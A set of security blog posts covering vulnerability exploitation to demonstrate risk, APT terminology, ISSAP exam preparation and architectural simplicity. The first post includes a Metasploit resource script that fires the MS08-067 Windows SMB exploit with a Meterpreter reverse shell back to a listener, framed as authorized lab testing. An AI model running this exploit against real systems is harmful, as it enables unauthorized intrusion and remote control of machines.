Exploit vulnerabilities rather than just report on ‘hypothetical’ issues

While doing some general reading recently I came across an article entitled “Why aren’t you using Metasploit to expose Windows vulnerabilities?”.  This reminded me of something I have discussed with people a few times: the benefits of actually proving and demonstrating how vulnerabilities can be exploited, rather than just relying on metrics from scanners.

Don’t get me wrong, vulnerability / patch scanners are incredibly useful for providing an overall view of the status of an environment:

– Are patches being deployed consistently across the environment in a timely manner?

– Are rules around password complexity, membership of the administrators group, the placement of machines and users in the correct locations in the LDAP database etc. being obeyed?

– Are software and O/S versions and types in line with the requirements / tech stack?

– etc..
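To make the kind of checks listed above concrete, here is a minimal sketch (my own illustration, not how any particular scanner is implemented) of the policy-compliance logic such tools automate. The host record, policy values and finding strings are all hypothetical:

```python
# Hypothetical policy and host record, purely for illustration.
POLICY = {"min_password_length": 12, "max_admins": 3,
          "approved_os": "Windows Server 2008"}

host = {
    "name": "srv01",
    "min_password_length": 8,
    "admins": ["alice", "bob", "svc_backup", "temp_admin"],
    "os": "Windows Server 2003",
}

def audit(host, policy):
    """Return a list of compliance findings for one host."""
    findings = []
    if host["min_password_length"] < policy["min_password_length"]:
        findings.append("weak password length policy")
    if len(host["admins"]) > policy["max_admins"]:
        findings.append("too many local administrators")
    if host["os"] != policy["approved_os"]:
        findings.append("OS not on approved tech stack")
    return findings

print(audit(host, POLICY))
```

A real scanner does this across thousands of hosts and hundreds of rules, which is exactly why the aggregate view is so valuable for compliance reporting.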

The output from these scanners is also extensively used to provide compliance / regulatory reporting data confirming that an environment is ‘correctly’ maintained.

Where these scans fall short is in two main areas:

1. They do not provide a real picture of the actual risk any of the identified vulnerabilities pose to your organisation, in your configuration, with your policies and rules applied.

2. Because of point 1, they may either fail to give senior management enough appreciation of the risks to prioritise remediation, or they may cause far too much fear owing to the many identified vulnerabilities that may or may not be exploitable.

In order to provide a quantitative demonstration of how easy (or difficult) it is to exploit identified vulnerabilities, and to show management how these reported vulnerabilities can actually be exploited, using tools such as Core Impact, Canvas or Metasploit in addition to just scanning for vulnerabilities is key.

Tools like Canvas and Core Impact are commercial offerings with relatively high price tags; Metasploit, however, is open source and free to use in both Windows and *nix environments. It even has a GUI!  So there is no excuse for not actually testing some key vulnerabilities identified by your scans, then demonstrating the results to senior management and even other IT staff to increase awareness.
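As a sketch of what ‘actually exploiting’ a scanner finding looks like, a Metasploit resource script for the classic MS08-067 Windows SMB vulnerability might look like the following. The module path is a real Metasploit module, but the IP addresses are placeholders for a lab setup – only ever run something like this against systems you are explicitly authorised to test:

```
# ms08_067_demo.rc -- run with: msfconsole -r ms08_067_demo.rc
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.56.101
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
exploit
```

A successful Meterpreter session opened this way makes a far more persuasive demonstration to management than a line in a scan report saying ‘arbitrary code execution possible’.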

Metasploit can be found here:

http://www.metasploit.com/

where it can be downloaded for free.  Should you wish to contribute to its success there are also paid-for versions.

The key message here is: don’t stop using the standard patch / vulnerability scans, as these are key to providing a picture of the entire environment and assurance of compliance with policies.  However, these should be supplemented by actually exploiting some key vulnerabilities to provide evidence of the actual risk in your environment, rather than just the usual ‘arbitrary code execution’ or similar statement related to the potential vulnerability.  This will put much more weight behind your arguments for improving security.

K


APT – new threat or just a new name? And just what does it mean?

The term Advanced Persistent Threat (APT) has become the de facto term for criminals, organisations and governments spending considerable time, effort and expertise attempting to gain access to another organisation’s data.

Now this is clearly not a new phenomenon, as people with the resources to do so have always put time into getting the information they want using technical and non-technical techniques, including:

– Dumpster diving

– Social engineering (over the phone, and in person on site)

– Viruses / Trojans / Worms delivered via email / usb / floppy disk / CD etc.

– Phishing / spear-phishing (or whatever targeted mails used to be called)

etc. etc.

The question is, has this problem suddenly become much larger and more of a concern, or is the new name and much of the news there to create fear and market security tools / services?

I am completely in favour of people having a common language, so giving a simple and agreed term to “criminals, organisations and governments spending considerable time, effort and expertise attempting to gain access to another organisation’s data” is definitely a good thing.  However, this term needs to be used with caution, so that the accusation of spreading unnecessary fear and uncertainty cannot be levelled against the security industry.

For example, how many of the attacks reported to have been launched from China by the Chinese government were actually launched from botnets in China, enabled by the fact that users in that country have among the highest levels of unpatched machines in the world?  I don’t know the answer, but while reading for this article I found conflicting thoughts and statements on the topic.

There is clearly a need for clarity and openness.  Everyone in the security industry, and increasingly people outside it, are aware that there are many risks out there, especially to machines without AV or not kept patched up to date.  The risk does, however, need to be fairly and realistically reported.

If a company is compromised, it is currently much less damaging to report it as an APT attack rather than owning up to some unpatched machines or a misconfigured firewall, or someone clicking on a phishing mail while logged in with administrative privileges etc.

Equally, though, when there is clear evidence of an APT, this should be clearly reported, especially if in doing so the techniques used can be revealed to help protect other potential victims.  Should government agents be clearly implicated, this should be reported, as governments are supposed to be beholden to international law and not to behave in a criminal manner.  I guess the same could and should be said of individuals and criminal organisations!

In short, clearly agreed universal terminology is a good thing to aid understanding and communication, even if it is not describing something new.  But clear and open reporting of threats is key if people are to make informed and correct decisions about the real risks, and about how much time and expense should go into mitigating them versus other threats and business needs.

Future posts will cover exactly what APT is in more detail, and also ask is the cloud something new?

ISSAP – Information Systems Security Architecture Professional

So, I recently received confirmation from the ISC2 (International Information Systems Security Certification Consortium) that I passed the ISSAP exam.   This is a secure architecture concentration in addition to the CISSP (Certified Information Systems Security Professional) certification.

I believe this should be a worthwhile addition to my CISSP and of course my CV, as well as helping progress my current role, but I also felt I should write a post about my preparation for the exam.

As with the CISSP, the best way to be prepared is to have a solid grounding in the subject matter – e.g. IT security and technical / solutions architecture.  Indeed, several years of industry experience is a prerequisite for obtaining these certifications.

Also as with the CISSP, I chose to cover the bulk of the revision using the ISC2 recommended course text.  For the CISSP I had used the well-regarded Shon Harris ‘CISSP All-in-One Guide’, which was well written and very comprehensive.

For the ISSAP I used the ISC2 Official Study Guide to the CISSP-ISSAP.  Currently this is the only book specifically for the ISSAP exam that claims to cover all aspects of it.  Personally I found it very badly written and hard to read.  The first chapter must have used the phrase ‘Confidentiality, Integrity, Availability’ in almost every sentence; yes, we all know that CIA is important and what we are aiming for, but there is no need to repeat it so often.

Other sections of the book only skimmed over areas that were quite heavily covered in the exam.

In short, if you did not already have a very solid grounding and experience in the areas covered by the exam, this official guide would not be anywhere near enough to pass.  Obviously the ISC2 may argue that you are supposed to have industry experience, but this does not necessarily cover all the areas in the exam, such as specific components of the Common Body of Knowledge or other specific standards.

If you are a CISSP involved in designing secure architectures then this certainly seems like a worthwhile certification to go for.  I would advise doing some supplementary reading covering the Common Body of Knowledge and something like ‘Enterprise Security Architecture’ along with of course a solid background in both security and architecture.

As an aside I am a firm believer that study and / or involvement in IT related work such as creating white papers, contributing to open source etc. is a great way to not only improve your skills and knowledge, but also essential to show current and future employers that you are genuinely passionate about what you do rather than it just being a job.

K

Simplicity

In preparation for doing the Enterprise and Solution Architecture course and exam from the Chartered Institute for IT, I have started reading the book ‘Simple Architectures for Complex Enterprises’ by Roger Sessions, from Microsoft Press.

While this is primarily a book about solution and enterprise architecture, its main focus is the often overlooked principle of simplicity.  The basic premise is that the simplest solution that meets the requirements is the best solution.

The vast majority of IT projects, even those that appear relatively straightforward, run over time or over budget, or both.  This is despite rigorous project processes (e.g. SDLC) and well understood architectural frameworks (e.g. Zachman, TOGAF).

The reason for this is that none of the project processes or architectural frameworks directly addresses complexity.  They do provide much needed rigour around how projects are run, and ensure that architects and the business can talk the same language via agreed frameworks, both of which add great value, but neither of which prevents unnecessary complexity from creeping into solutions.

In addition to increasing cost and time to delivery, overly complex solutions are much harder to:

Maintain – which component is causing the issue when troubleshooting? Will patching one part impact others?

Secure – simple solutions are easy to test and make secure from the outset; complex solutions are likely insecure from the outset and near impossible to fully understand and secure further down the line.
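As a back-of-the-envelope illustration (my own arithmetic, not an example from the book) of why partitioning a solution matters: the combined state space of interdependent components grows multiplicatively, while truly independent partitions only add.

```python
# Illustrative only: with s possible states per component, n
# interdependent components give s**n combined states to reason about,
# whereas independent partitions can be understood one at a time.
def state_space(n_components, states_each=2):
    return states_each ** n_components

monolith = state_space(12)        # 12 tangled components: 2**12 states
partitioned = 3 * state_space(4)  # three independent groups of 4 components
print(monolith, partitioned)      # 4096 vs 48
```

The numbers are toy values, but the shape of the result is the point: splitting the same twelve components into independent partitions reduces what must be understood, tested and secured by orders of magnitude.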

A further post will follow covering some of the techniques outlined in the book around understanding complexity and eliminating it from solutions to even complex problems.

In the meantime, keep it simple, and remember: just because your business or the problem you are trying to solve is complex, that does not mean the solution needs to be complicated!

K